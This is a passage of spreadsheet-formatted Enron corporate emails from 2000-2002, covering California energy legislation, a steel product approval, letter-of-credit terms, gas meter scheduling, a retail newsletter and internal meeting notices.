Both documents cannot be obtained due to attorney-client privilege.  This_x000D_
issue is coming to a head next week with a decision pending by the CEC to_x000D_
include a California First clause on the approval of an expedited AES power_x000D_
plant project._x000D_
_x000D_
AB 60x (Hertzberg), which ties to the siting process the requirement that a_x000D_
developer enter into a contract to sell power to specified California_x000D_
entities, is still poised to be heard in the Senate Energy committee.  IEP_x000D_
members company lobbyist should continue to lobby against this measure_x000D_
regardless of the CEC=01,s decision on AES, although our arguments are_x000D_
definitely strengthened if the addition of the clause at the CEC is denied._x000D_
_x000D_
-- IEP has finalized negotiations with Senator Burton=01,s office on amendm=_x000D_
ents_x000D_
attempting to solve our problem with the eminent domain provision in SB 6x_x000D_
(Burton), which is the State Power Authority measure.  Attached is a copy o=_x000D_
f_x000D_
the bill in PDF form.  The agreed upon language, which clarifies that the_x000D_
Authority=01,s purpose is to supplement existing generation activities, can=_x000D_
 be_x000D_
found on pages 6-7 (Section 3310), 13 (Section 3341.1) and 16-17_x000D_
(Section3352). Considering the inflammatory remarks made by Senator Burton_x000D_
in the press lately regarding seizing generation assets, this was most_x000D_
likely the best we could get._x000D_
_x000D_
-- The first of Senator Dunn=01,s hearings with the Senate Select Committee=_x000D_
 to_x000D_
Investigate Price Manipulation of the Wholesale Market occurred this week._x000D_
This week and next week=01,s topics will be to go over previous investigati=_x000D_
ons_x000D_
into market power. The committee heard or will be hearing testimony from:_x000D_
Frank Wolak, Chairman Market Surveillance Committee, CAISO; Eric_x000D_
Hildebrandt, Manager Market Monitoring, CAISO; and, Elaine Howle, State_x000D_
Auditor._x000D_
_x000D_
--  The Assembly Electricity Oversight Subcommittee met this week and_x000D_
focused on the issue of natural gas collusion. Testifying before the_x000D_
committee were representatives from Dynegy and El Paso, commenting on the_x000D_
rise of natural gas prices and whether illegal market manipulation and_x000D_
collusion occurred.  The subcommittee plans on putting together a package o=_x000D_
f_x000D_
bills related to natural gas issues, which would be the culmination of the_x000D_
committee=01,s hearings over the last two months.  This package will be up =_x000D_
for_x000D_
consideration first by the whole special Assembly Energy committee._x000D_
_x000D_
-- Governor Davis came out this week supporting the construction of the_x000D_
Calpine Metcalf Energy Center, the 600-megawatt power plant proposed for th=_x000D_
e_x000D_
San Jose region.  The Governor urged the CEC to approve the plant siting so_x000D_
that construction can begin._x000D_
_x000D_
-- Two long-term contracting bills are scheduled for hearings next week._x000D_
IEP counsel is currently reviewing AB 57 (Wright) and SB 997 (Morrow) and_x000D_
will comment on their provisions as soon as possible._x000D_
_x000D_
--  Attached is the most recent legislative tracking reports, both the_x000D_
special session and regular session.  Please let me know if you need copies_x000D_
of any of these bills._x000D_
_x000D_
_x000D_
UPCOMING EVENTS:_x000D_
_x000D_
MONDAY, April 23rd_x000D_
Assembly Utilities and Commerce Committee_x000D_
AB 57 (Wright) =01) long-term contracting reasonableness review_x000D_
_x000D_
TUESDAY, April 24th_x000D_
Senate Energy Committee_x000D_
SB 997 (Morrow) =01) long-term contracting reasonableness review_x000D_
_x000D_
WEDNESDAY, April 25th_x000D_
Assembly Appropriations Committee_x000D_
AB 62x (Cohn) =01) California First_x000D_
AB 63x (Florez) =01) Sale of Kern Power Plant_x000D_
_x000D_
THURSDAY, April 26th_x000D_
Select Committee to Investigate Price Manipulation of the Wholesale Market_x000D_
Informational hearing on the overview of investigations, studies, and_x000D_
reports regarding the energy crisis._x000D_
_x000D_
MONDAY, April 30th_x000D_
Senate Appropriations Committee_x000D_
SB 1x (Soto) =01) excess profits tax_x000D_
_x000D_
Assembly Revenue and Taxation Committee_x000D_
AB 128x (Corbett) =01) excess profits tax_x000D_
_x000D_
ON THE ASSEMBLY FLOOR_x000D_
SB 6x (Burton) =01) State Power Authority_x000D_
SB 28x (Sher/Battin) =01) siting_x000D_
_x000D_
--end--_x000D_
_x000D_
Julee Malinowski-Ball_x000D_
Senior Associate_x000D_
Edson + Modisette_x000D_
916-552-7070_x000D_
FAX-552-7075_x000D_
jmball@ns.net_x000D_
_x000D_
_x000D_
_x000D_
 - 2001 Tracking Report.doc_x000D_
 - 2001 Tracking Report.special session.doc_x000D_
 - sbx1_6_bill_20010419_amended_asm.pdf</t>
  </si>
  <si>
    <t>Mon, 23 Apr 2001 08:23:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'robert.cass@enron.com'})</t>
  </si>
  <si>
    <t>frozenset({'bjorn.hagelmann@enron.com', 'jeff.blumenthal@enron.com', 'susan.musch@enron.com', 'manfred.roenz@enron.com', 'matthew.gockerman@enron.com', 'tom.moran@enron.com', 'brenda.herod@enron.com', 'frank.hayden@enron.com', 'mark.taylor@enron.com'})</t>
  </si>
  <si>
    <t>Please Approve New Product Type:  US Steel Cold Rolled Phy (2064)</t>
  </si>
  <si>
    <t>Please approve the following product type in Datamanager after 11:00 a.m.  _x000D_
See the steps for approval below._x000D_
_x000D_
US Steel Cold Rolled Plate Phy_x000D_
_x000D_
Website Short Description of Product Type:  US CR Steel Phy    ("US Steel _x000D_
Cold Rolled Physical" - #2064)_x000D_
_x000D_
_x000D_
Product Type:_x000D_
A U.S Cold Rolled Steel Transaction with Enron North America Corp, under _x000D_
which the Seller shall deliver and the Buyer shall take and pay for the _x000D_
Contract Quantity of the Commodity at the Purchase Price. The Purchase Price _x000D_
shall be the price submitted by Counterparty via EnronOnline.  The Commodity _x000D_
shall meet specifications and tolerances as further defined below, unless _x000D_
quality tolerances are outlined in Schedule 4 on the Website _x000D_
(http://www/enrononline.com/docs/marketing/Markets/Steel/US/Products/)._x000D_
_x000D_
Reference Period:_x000D_
The term of the Transaction shall be from the Effective Date (or start date) _x000D_
to the Termination Date (or end date). The Effective Date (or start date) is _x000D_
01 Oct 2001. The Termination Date (or end date) is 31 Oct 2001._x000D_
_x000D_
Product Additional Information (example):_x000D_
The Transaction is for cold rolled steel with a thickness of 12 Guage and a _x000D_
width of 48 inches. The Commodity shall be commercial quality, prime, _x000D_
continuous cast, hot rolled steel in coil with specifications to ASTM A366 _x000D_
and tolerances to ASTM A568, unless quality tolerances are outlined in _x000D_
Schedule 3 on the Website. The transaction is F.O.B. Reserve Marine Terminal _x000D_
in Chicago, Ill Metro Area.  F.O.B. refers to the following terms: Seller is _x000D_
responsible for freight, unloading and storage up to and including delivery _x000D_
in warehouse; Buyer is responsible for storage, loading and freight after _x000D_
delivery.  The Contract Quantity shall be quantity submitted by Counterparty _x000D_
via EnronOnline (5% greater or lesser allowance at Seller's option). Each _x000D_
calendar month during the term of the Transaction will be a Dispatch Period.  _x000D_
Enron will guarantee delivery by the 20th of each scheduled Dispatch Period _x000D_
and accept supply to the 15th of each scheduled Dispatch Period.  Payment _x000D_
shall be made, against the receipt of the required documents outlined in the _x000D_
General Terms and Conditions, in the Contractual Currency by telegraphic _x000D_
transfer no later than 30 calendar days after the date on which the Commodity _x000D_
is released to Buyer. _x000D_
_x000D_
Currency:_x000D_
The price is quoted in US Dollars per unit of volume, which will be the _x000D_
Contractual Currency._x000D_
_x000D_
Unit of Measure:_x000D_
The unit of measure against which the price is quoted shall be net tons (2000 _x000D_
lbs) and the quantity shown shall be in net tons per month.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t>
  </si>
  <si>
    <t>Tue, 5 Jun 2001 23:43:02 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'yourteam2@ourhouse.com'})</t>
  </si>
  <si>
    <t>Get FREE shipping and great gifts for Father's Day at OurHouse.com</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
 OurHouse.com [IMAGE]From OurHouse to Yours   [IMAGE]   Father's Day at Our=_x000D_
House.com means 1000s of Great Gift Ideas and 0 Hassles.   Plus you'll get =_x000D_
20% off select Power Glide Power Tools with Free Shipping on all orders ove=_x000D_
r $99. Thinking about a great gift for Dad? We make it easy ? and affordabl=_x000D_
e ? with 20% off select Power Glide Power Tools and Free Shipping on orders=_x000D_
 over $99.          Get 20% off these Power Glide tools   6-speed Electroni=_x000D_
c Grinder6-speed Electronic Grinder  Reg. $27.99  Now $22.39  [IMAGE] 135 P=_x000D_
iece Tool Set135 Piece Tool Set  Reg. $38.15  Now $30.52  [IMAGE] 14.4v Dri=_x000D_
ll14.4v Drill  Reg. $54.99  Now $43.99      [IMAGE]     Cordless Tool KitCo=_x000D_
rdless Tool Kit  Reg. $119.99  Now $95.99  [IMAGE] Cordless TrimmerCordless=_x000D_
 Hedge/Grass Trimmer  Reg. $79.99  Now $63.99          [IMAGE]     More of =_x000D_
Dad's Favorites [IMAGE]  Barbecue StationBarbecue Station  [IMAGE]$126.99  =_x000D_
[IMAGE] Keg-a-Que Portable GrillKeg-a-Que Portable Grill  [IMAGE]$59.99  [I=_x000D_
MAGE] Patio CaddiePatio Caddie  [IMAGE]$149.99      [IMAGE]     Adirondack =_x000D_
chairAdirondack Chair  [IMAGE]$69.99  [IMAGE] HammockHammock, Hammock Stand=_x000D_
 and Pillow  [IMAGE]$143.99     [IMAGE]   Still stumped? Don't worry.  We'v=_x000D_
e updated our Father's Day Gift Shops with the gifts that Dads love. Father=_x000D_
's Day Gifts The Gourmet Dad  The Gardening Dad  The Party Dad  The Tool Da=_x000D_
d  Big Boy Toys  The Grillin' Dad      [IMAGE]   Does Dad need a little wor=_x000D_
k done around the house?  Hire someone to take care of it for him. OurHouse=_x000D_
 Home Services. Find a professional  handyman, landscaper or remodeler in y=_x000D_
our neighborhood.    [IMAGE]       If you'd like to make changes to your ne=_x000D_
wsletter preferences, or would no longer like to receive our newsletters, p=_x000D_
lease click here .  Please allow 1-2 weeks for us to remove your name from =_x000D_
our email list. You may receive further emails from us during that time. We=_x000D_
 apologize for any inconvenience.  OurHouse.com and Everything Your House D=_x000D_
esires are service marks of OurHouse, Inc. Partnered with Ace. Ace is a reg=_x000D_
istered trademark of Ace Hardware Corporation.   =09_x000D_
</t>
  </si>
  <si>
    <t>Thu, 5 Oct 2000 13:05:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'christopher.calger@enron.com', 'james.steffes@enron.com', 'paul.kaufman@enron.com'})</t>
  </si>
  <si>
    <t>DRAFT Slides--Davis' Auction</t>
  </si>
  <si>
    <t xml:space="preserve">Here's the next version of the slides.  Few points:_x000D_
_x000D_
There are a few holes (pre-quals and process in particular)--my brain began _x000D_
to fail.  But I think there's enough of a structure so that we can easily _x000D_
finalize by tomorrow._x000D_
I didn't have an electronic version of Whaley's slides, so I couldn't _x000D_
integrate them.  But I don't think it will take much to do the integration._x000D_
Some of Whaley's slides have a strong marketing slant--we should think hard _x000D_
about whether we include them lest we lose our mantle of objectivity._x000D_
We still have some wordsmithing to do re: participate, run the auction, or _x000D_
participate and run the auction._x000D_
_x000D_
Best,_x000D_
Jeff_x000D_
</t>
  </si>
  <si>
    <t>Fri, 12 May 2000 09:58:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'karen_ector@transcanada.com'})</t>
  </si>
  <si>
    <t>Re: LC Form</t>
  </si>
  <si>
    <t xml:space="preserve">Karen:_x000D_
Please take a look at what we have agreed to in Section 4(b) of the _x000D_
amendment.  Your new language does not track that language and if you are _x000D_
going to add language to the LC it needs to track that language.  I _x000D_
personally feel that this language is unnecessary so long as the drawing _x000D_
condition is specified._x000D_
Carol_x000D_
_x000D_
_x000D_
_x000D_
	"Karen Ector" &lt;karen_ector@transcanada.com&gt;_x000D_
	05/12/2000 04:42 PM_x000D_
		 _x000D_
		 To: Carol St Clair &lt;Carol.St.Clair@enron.com&gt;_x000D_
		 cc: _x000D_
		 Subject: Re: LC Form_x000D_
_x000D_
_x000D_
Carol:_x000D_
_x000D_
The additional transfer language is sufficient._x000D_
_x000D_
I black lined an insert to address TEFP's concern that the letter of credit _x000D_
may be exercised on_x000D_
default, only when funds are owed._x000D_
_x000D_
Please advise if this change is acceptable to Enron.  (If it is, I will print _x000D_
copies of the_x000D_
attached, &amp; replace the existing letter of credit format with the attached _x000D_
document, so that_x000D_
Susan does not have to generate executions copies again.)_x000D_
_x000D_
_x000D_
Thank you,_x000D_
_x000D_
_x000D_
_x000D_
Karen_x000D_
_x000D_
Carol St Clair wrote:_x000D_
_x000D_
&gt; Karen:_x000D_
&gt; Enclosed is a new draft of the LC Form in which I have incorporated some_x000D_
&gt; additional transfer language that hopefully deals with your issue.  Please _x000D_
[ass_x000D_
&gt; it on to the people taht need to see it.  Thanks._x000D_
&gt;_x000D_
&gt; (See attached file: TransCanada LC Form 5-12.doc)_x000D_
&gt;_x000D_
&gt; Carol St. Clair_x000D_
&gt; EB 3892_x000D_
&gt; 713-853-3989 (Phone)_x000D_
&gt; 713-646-3393 (Fax)_x000D_
&gt;_x000D_
&gt;   ------------------------------------------------------------------------_x000D_
&gt;                                           Name: TransCanada LC Form 5-12.doc_x000D_
&gt;                                           Type: Microsoft Word Document _x000D_
(application/msword)_x000D_
&gt;    TransCanada LC Form 5-12.doc       Encoding: base64_x000D_
&gt;                                    Description: Mac Word 3.0_x000D_
&gt;                                Download Status: Not downloaded with message_x000D_
_x000D_
 - TransCanada LC Form 5-121R.doc_x000D_
</t>
  </si>
  <si>
    <t>Fri, 20 Apr 2001 09:49:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Monthly Gas Forecasts 04/20/01</t>
  </si>
  <si>
    <t>Attached is PIRA's latest "Monthly Gas Forecast"_x000D_
_x000D_
If there are questions about this Monthly Gas Forecast please contact Greg_x000D_
Shuttlesworth (Email: greg@pira.com), Tom Howard (EMail: tazh@pira.com),_x000D_
Richard Redash (Email: rich@pira.com), Nobu Tarui (Email: nobuo@pira.com) or_x000D_
Jane Hsu (Email: jane@pira.com).  All can be reached at (212) 686-6808._x000D_
_x000D_
Contact John Graziano regarding PIRA report distribution at (212) 686-6808,_x000D_
Email: jgraziano@pira.com._x000D_
_x000D_
Unauthorized distribution of PIRA's Monthly Gas Forecast is prohibited._x000D_
_x000D_
PIRA Energy Group_x000D_
_x000D_
_x000D_
_x000D_
 - gasapr01.pdf_x000D_
 - gasindsuppl.pdf</t>
  </si>
  <si>
    <t>Wed, 12 Apr 2000 08:44:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Re: February and March 2000 Meter 5688</t>
  </si>
  <si>
    <t xml:space="preserve">Have you asked Karry Kendall about this meter?_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Jackie Young_x000D_
04/12/2000 02:38 PM_x000D_
To: Daren J Farmer/HOU/ECT@ECT_x000D_
cc: Fred Boas/HOU/ECT@ECT _x000D_
Subject: February and March 2000 Meter 5688_x000D_
_x000D_
Daren,_x000D_
_x000D_
Is Fred's below concern something that you might be able to help us with?  I _x000D_
was thinking that (maybe) the volumes from this meter might belong to HPL.  _x000D_
This is one of the meters that no longer go thru King Ranch._x000D_
_x000D_
Thanks_x000D_
-Jackie-_x000D_
---------------------- Forwarded by Jackie Young/HOU/ECT on 04/12/2000 02:37 _x000D_
PM ---------------------------_x000D_
_x000D_
_x000D_
Fred Boas_x000D_
04/11/2000 10:29 AM_x000D_
To: Jackie Young/HOU/ECT@ECT_x000D_
cc: Howard B Camp/HOU/ECT@ECT, Robert E Lloyd/HOU/ECT@ECT _x000D_
Subject: February and March 2000 Meter 5688  _x000D_
_x000D_
_x000D_
	_x000D_
_x000D_
Jackie:_x000D_
_x000D_
Meter 5688 is incorrectly scheduled to the HPL Liquids contract _x000D_
012-41970-02-002 in March 2000.  Also last month when you were out, Robert _x000D_
removed the volume from the Liquids contract at this meter and temporarily _x000D_
put it on a Strangers Gas contract.  If you could fix both months today and _x000D_
let me know when it is corrected  I would appreciate it._x000D_
_x000D_
Thanks,_x000D_
_x000D_
Fred_x000D_
_x000D_
_x000D_
_x000D_
Fred Boas_x000D_
02/16/2000 04:35 PM_x000D_
To: Jackie Young/HOU/ECT@ECT_x000D_
cc: Howard B Camp/HOU/ECT@ECT, Robert E Lloyd/HOU/ECT@ECT, Anita _x000D_
Luong/HOU/ECT@ECT _x000D_
Subject: 1/2000 Meters 5688 &amp; 5801_x000D_
_x000D_
_x000D_
	_x000D_
_x000D_
Jackie:_x000D_
_x000D_
I am new at the 3 Rivers allocation so bear with me, I took this over from _x000D_
Anita Luong.  In January 2000, and going forward, please make sure that _x000D_
Meters 5688 and 5801 are not scheduled on the HPL Liquids contract _x000D_
012-41970-02-002.  The contract is currently out of balance by the total _x000D_
volume at these two meters so if you could fix this by early tomorrow morning _x000D_
I would appreciate it._x000D_
_x000D_
Thanks,_x000D_
_x000D_
Fred_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Tue, 28 Nov 2000 07:40:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'jons@amerexenergy.com'})</t>
  </si>
  <si>
    <t>frozenset({'ddunnavant@reliantenergy.com', 'robert.k.rodriguez@db.com', 'sschnitz@jcpenney.com', 'sandra.f.brawner@enron.com', 'gee_ruiz@hotmail.com', 'aertel@evomarkets.com', 'lmorris1@pclient.ml.com', 'paulla@maritz.com', 'jrschnitzer@hotmail.com'})</t>
  </si>
  <si>
    <t>Fw: (no subject)</t>
  </si>
  <si>
    <t>----- Original Message -----_x000D_
From: &lt;diana.hollier@tpc-corp.com&gt;_x000D_
To: &lt;jons@amerexenergy.com&gt;_x000D_
Sent: Tuesday, November 28, 2000 1:32 PM_x000D_
Subject: FW: (no subject)_x000D_
_x000D_
_x000D_
&gt;_x000D_
&gt;_x000D_
&gt; -----Original Message-----_x000D_
&gt; From: Jeff Young [mailto:riskadvisors@yahoo.com]_x000D_
&gt; Sent: Tuesday, November 28, 2000 8:51 AM_x000D_
&gt; To: Scott E. Thompson; Debby Young; Tom Pisula; Jim Lindsay; Kathryn A_x000D_
&gt; Henline; Rob Derrick; Grant Farris; John Fioriello; 'Billy'; 'Di'; Rob_x000D_
&gt; Baker (E-mail); Daniel R Olson_x000D_
&gt; Subject: Fwd: (no subject)_x000D_
&gt;_x000D_
&gt;_x000D_
&gt;_x000D_
&gt; --- Yortex@aol.com wrote:_x000D_
&gt; &gt; From: Yortex@aol.com_x000D_
&gt; &gt; Date: Mon, 27 Nov 2000 17:56:57 EST_x000D_
&gt; &gt; Subject: (no subject)_x000D_
&gt; &gt; To: djs37@earthlink.net, riskadvisors@yahoo.com, Jentudor@aol.com,_x000D_
&gt; &gt;         CLAFFEE1@aol.com, Cassandra_Louise@hotmail.com_x000D_
&gt; &gt;_x000D_
&gt; &gt; POSSIBLY THE VERY BEST CHICKEN JOKE EVER_x000D_
&gt; &gt;_x000D_
&gt; &gt;  A chicken and an egg are lying in bed. The chicken is leaning against_x000D_
&gt; &gt; the_x000D_
&gt; &gt; headboard smoking a cigarette, with a satisfied smile on its face.  The_x000D_
&gt; &gt; egg, looking a bit pissed off, grabs the sheet, rolls over, and says_x000D_
&gt; &gt; "Well,_x000D_
&gt; &gt; I guess we finally answered THAT question." &gt;&gt;_x000D_
&gt;_x000D_
&gt;_x000D_
&gt; =====_x000D_
&gt; Jeff Young_x000D_
&gt; Risk Advisors, LLC_x000D_
&gt; 713-503-1963_x000D_
&gt;_x000D_
&gt; ___________________________________________________x000D_
&gt; Do You Yahoo!?_x000D_
&gt; Yahoo! Shopping - Thousands of Stores. Millions of Products._x000D_
&gt; http://shopping.yahoo.com/</t>
  </si>
  <si>
    <t>Thu, 12 Oct 2000 09:04:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'ruth.concannon@enron.com'})</t>
  </si>
  <si>
    <t>Proposed documents for Oct, Nov &amp; Dec for Sithe Transactions_x000D_
 attached.</t>
  </si>
  <si>
    <t xml:space="preserve">Please review the below and lets discuss if this really works._x000D_
</t>
  </si>
  <si>
    <t>Wed, 6 Feb 2002 14:08:33 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'neil.davies@enron.com'})</t>
  </si>
  <si>
    <t>frozenset({'judy.townsend@enron.com', 'diana.allen@enron.com', 'jay.reitmeyer@enron.com', 'd..hogan@enron.com', 'doug.gichana@enron.com', 'dutch.quigley@enron.com', 'frank.ermis@enron.com', 'danielle.marcinkowski@enron.com', 'k..allen@enron.com', 'russ.severson@enron.com', 'amy.fitzpatrick@enron.com', 'sherry.anastas@enron.com', 'j..ewing@enron.com', 'dan.dietrich@enron.com', 'rick.le@enron.com', 'amanullah.aman@enron.com', 'scott.neal@enron.com', 'tammy.jaquet@enron.com', 'scott.shishido@enron.com', 'bryce.baxter@enron.com', 'jamey.johnston@enron.com', 'karen.buckley@enron.com', 'julie.clyatt@enron.com', 'clay.elliott@enron.com', 'ina.rangel@enron.com', 'brad.jones@enron.com', 'shivshankar.kandavelu@enron.com', 'ravi.arumbakkam@enron.com', 'chris.austin@enron.com', 'john.oh@enron.com', 'cathy.sprowls@enron.com', 'claudia.guerra@enron.com', 'matthew.lenhart@enron.com', 'errol.mclaughlin@enron.com', 'natalie.baker@enron.com', 'edward.ray@enron.com', 'charles.jacobs@enron.com', 'jared.kaiser@enron.com', 'laura.vargas@enron.com', 'michael.barber@enron.com', 'janine.cashin@enron.com', 'michael.dolan@enron.com', 'acey.nash@enron.com', 'bill.knox@enron.com', 'amanda.rybarski@enron.com', 'm..tholt@enron.com', 'shelly.mendel@enron.com', 'kristen.clause@enron.com', 'f..brawner@enron.com', 'frank.vickers@enron.com', 'john.valdes@enron.com', 'arun.balasundaram@enron.com', 'mark.hall@enron.com', 'jason.althaus@enron.com', 'geoff.storey@enron.com', 'luis.aybar@enron.com', 'c..giron@enron.com', 'p..south@enron.com', 'suzanne.christiansen@enron.com', 'monte.jones@enron.com', 'anthony.jarrett@enron.com', 'andrea.ring@enron.com', 'david.steiner@enron.com', 'joseph.taylor@enron.com', 'darren.adamik@enron.com', 'mathew.smith@enron.com', 'charles.ballmer@enron.com', 'craig.breslau@enron.com', 'david.oxley@enron.com', 'leah.van@enron.com', 'mike.grigsby@enron.com', 'a..cummings@enron.com', 'matthew.olney@enron.com', 'barry.tycholiz@enron.com', 'kevin.whitehurst@enron.com', 'susan.amador@enron.com', 'nilay.basu@enron.com', 'john.taylor@enron.com', 'benjamin.thompson@enron.com', 'troy.beyer@enron.com', "ryan.o'rourke@enron.com", 'p..adams@enron.com', 'joe.hall@enron.com', 'kathy.link@enron.com', 'jenny.rub@enron.com', 'randy.bhatia@enron.com', 'kori.loibl@enron.com', 'eric.bass@enron.com', 'bob.mcauliffe@enron.com', 'melissa.videtto@enron.com', 'john.shupak@enron.com', 'm..love@enron.com', 'jae.black@enron.com', 'richard.pinion@enron.com', 'genaro.mendoza@enron.com', 'jon.werner@enron.com', 'simon.burgess@enron.com', 'houston &lt;.ward@enron.com&gt;', 'kimberly.hillis@enron.com', 'frank.coles@enron.com', 'marlin.gubser@enron.com', 'c..gossett@enron.com', 'h..otto@enron.com', 'matthew.james@enron.com', 'faheem.qavi@enron.com', 'brent.tiner@enron.com', 'keith.holst@enron.com', 'habib.ahsan@enron.com', 'chris.behney@enron.com', 'diana.cioffi@enron.com', 'keith.dziadek@enron.com', 'eddie.zhang@enron.com', 'darren.mcnair@enron.com', 'ted.ballinger@enron.com', 'michael.olsen@enron.com', 'jonathan.mckay@enron.com', 'a..martin@enron.com', 'becky.young@enron.com', 'l..mims@enron.com', 's..shively@enron.com', 'stephen.perich@enron.com', 'donnie.myers@enron.com', 'victor.bulbes@enron.com', 'laura.vuittonet@enron.com', 'todd.thelen@enron.com', 'd.alexander@enron.com', 'scott.palmer@enron.com', 'roberto.deleon@enron.com', 'janet.devereaux@enron.com', 'patti.sullivan@enron.com', 'carlos.uribe@enron.com', 'jennifer.shipos@enron.com', 'kari.oquinn@enron.com', 'n..gilbert@enron.com', 'neil.davies@enron.com', 'mike.maggi@enron.com', 'steve.shortt@enron.com', 'micah.staggs@enron.com', 'paige.cox@enron.com', 'tammie.schoppe@enron.com', 'daniel.muschar@enron.com', 'cedric.belt@enron.com', 'ryan.brennan@enron.com', 'james.hungerford@enron.com', 'david.baumbach@enron.com', 'dan.arellano@enron.com', 'trey.rhodes@enron.com', 'g..moore@enron.com', 'larry.may@enron.com', 'bruce.smith@enron.com', 'jeanie.slone@enron.com', 'bruce.mills@enron.com', 'tina.rode@enron.com', 'michael.castillo@enron.com', 'd..winfree@enron.com', 'l..gay@enron.com', 'gary.bode@enron.com', 'bryant.frihart@enron.com', 'john.cheng@enron.com', 'kam.keiser@enron.com', 'john.lavorato@enron.com', 'ashley.worthing@enron.com', 'j..hanson@enron.com', 'amanda.curless@enron.com', 'jason.mcnair@enron.com', 'trading &lt;.williams@enron.com&gt;', 'brian.larkin@enron.com', 'stephanie.miller@enron.com', 'charles.weldon@enron.com'})</t>
  </si>
  <si>
    <t>REMINDER: UBSW Orientation - Thursday. For those that did not_x000D_
 attend the Houstonian Sessions</t>
  </si>
  <si>
    <t>Date: Thursday, February 7th , 2002_x000D_
_x000D_
Location: ECS 06980_x000D_
_x000D_
Orientation will be split into two sessions and divided by alpha-order. Sessions will run 10am-12 pm and 2pm- 4 pm._x000D_
_x000D_
We encourage all of you to attend your designated session as valuable information will be presented, and you will have the opportunity to get answers to your questions._x000D_
_x000D_
You can speed things up tomorrow by filing in the attached forms - alternatively you can complete them there_x000D_
_x000D_
10am Session   Letters A- K_x000D_
_x000D_
2pm Session Letters L-Z_x000D_
_x000D_
_x000D_
_x000D_
    _x000D_
PLEASE RSVP (BY REPLYING TO THIS E-MAIL) - IF YOU HAVEN'T DONE SO ALREADY</t>
  </si>
  <si>
    <t>Tue, 16 Oct 2001 06:49:19 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'j..yanowski@enron.com'})</t>
  </si>
  <si>
    <t>RE: IT Commercial Coordination Budget</t>
  </si>
  <si>
    <t xml:space="preserve">Tommy,_x000D_
_x000D_
I've been getting lots of email about IT budgets. My roll is to oversee the IT projects specifically for Gas Trading, particularly development projects._x000D_
_x000D_
I'm not sure your projects will directly affect gas trading and i dont know who to point you toward._x000D_
_x000D_
Sorry i cant help. Call me if you like_x000D_
_x000D_
geof_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Yanowski, Tommy J.  _x000D_
Sent:	Monday, October 15, 2001 4:47 PM_x000D_
To:	Storey, Geoff_x000D_
Subject:	IT Commercial Coordination Budget_x000D_
_x000D_
Geoff:  I understand that I need to get with you to approve the portion of my budget that is allocated the Enron America's.  Currently  $  299,871 is budgeted for allocation to EA.  My group coordinates JV activities as well as conducting due diligence on IT areas related to aquisitions and divestitures.  The amount budgeted above is for the following known projects:_x000D_
_x000D_
		Coordination and Operations under the Bridgeline IT Services Agreement_x000D_
		Due Diligence related to Project Sugarcane and how we may monetize our investment in Bridgeline_x000D_
_x000D_
In 2002 ENA will bill Bridgeline $1,250,000 for IT Services.  Since Chevron/Texaco covers 60% of the bill ENA will net $750,000 in revenue for the services coordinated by my group.  _x000D_
_x000D_
Let me know if you'd like to get together and discuss this in any detail._x000D_
_x000D_
Tommy Yanowski  x36858._x000D_
		</t>
  </si>
  <si>
    <t>Tue, 25 Jan 2000 05:26:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'mary.smith@enron.com', 'pat.clynes@enron.com', 'gary.hanks@enron.com', 'james.mckay@enron.com', 'brenda.herod@enron.com', 'earl.tisdale@enron.com'})</t>
  </si>
  <si>
    <t>Pre-Bid</t>
  </si>
  <si>
    <t>Location for Pre-Bid is 30C1._x000D_
_x000D_
D</t>
  </si>
  <si>
    <t>Fri, 24 Aug 2001 06:50:49 -0700 (PDT)</t>
  </si>
  <si>
    <t>FW: Executive Committee</t>
  </si>
  <si>
    <t>_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Lay, Kenneth  _x000D_
Sent:	Friday, August 24, 2001 8:08 AM_x000D_
To:	Allen, Phillip K.; Beck, Sally; Belden, Tim; Butts, Bob; Calger, Christopher F.; Carter, Rebecca; Colwell, Wes; Cordes, Bill; Cumberland, Shawn; Deffner, Joseph; Detmering, Timothy J.; Dimichele, Rich; Dodson, Keith; Donahue, Jeff; Duran, W. David; Dyson, Fernley; Estrems, Connie; Gillis, John; Gold, Joe; Hayes, Robert; Hermann, Robert; Hickerson, Gary; Hutchinson, Michael; Jackson, Charlene; Kaminski, Vince J; Kishkill, Joe; Lewis, Richard; Lindholm, Tod A.; Lowry, Phil; Mcclellan, George; McKeever, Tom; Milnthorp, Rob; Mordaunt, Kristina; Muller, Mark; Murray, Julia; Piper, Greg; Prentice, James; Redmond, Brian; Rieker, Paula; Shapiro, Richard; Sharp, Vicki; Shelby, Rex; Sullivan, Colleen; Taylor, Mitch; Tilney, Elizabeth; Umanoff, Adam; Walls Jr., Rob; Wasaff, George_x000D_
Subject:	Executive Committee_x000D_
_x000D_
	As announced earlier, we will be bringing all Managing Directors together, on a quarterly basis.  Please hold open the first Monday of every quarter (from 8:30 a.m. to 12:00 p.m.) for this purpose.  However, our first meeting will be on Tuesday, October 2nd.  I look forward to seeing you there.</t>
  </si>
  <si>
    <t>Fri, 1 Dec 2000 03:04:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Is this what you want?</t>
  </si>
  <si>
    <t xml:space="preserve">---------------------- Forwarded by Patrice L Mims/HOU/ECT on 12/01/2000 _x000D_
10:59 AM ---------------------------_x000D_
   _x000D_
	_x000D_
	_x000D_
	From:  Kevin Ruscitti                           11/30/2000 02:35 PM_x000D_
	_x000D_
_x000D_
To: Patrice L Mims/HOU/ECT@ECT_x000D_
cc:  _x000D_
Subject: FOM_x000D_
_x000D_
P,_x000D_
_x000D_
Please forward this to GD.  Thanks,_x000D_
_x000D_
Kevin_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Fri, 14 Jun 2002 05:46:23 -0700 (PDT)</t>
  </si>
  <si>
    <t>howdy</t>
  </si>
  <si>
    <t>Mon, 15 Oct 2001 09:00:35 -0700 (PDT)</t>
  </si>
  <si>
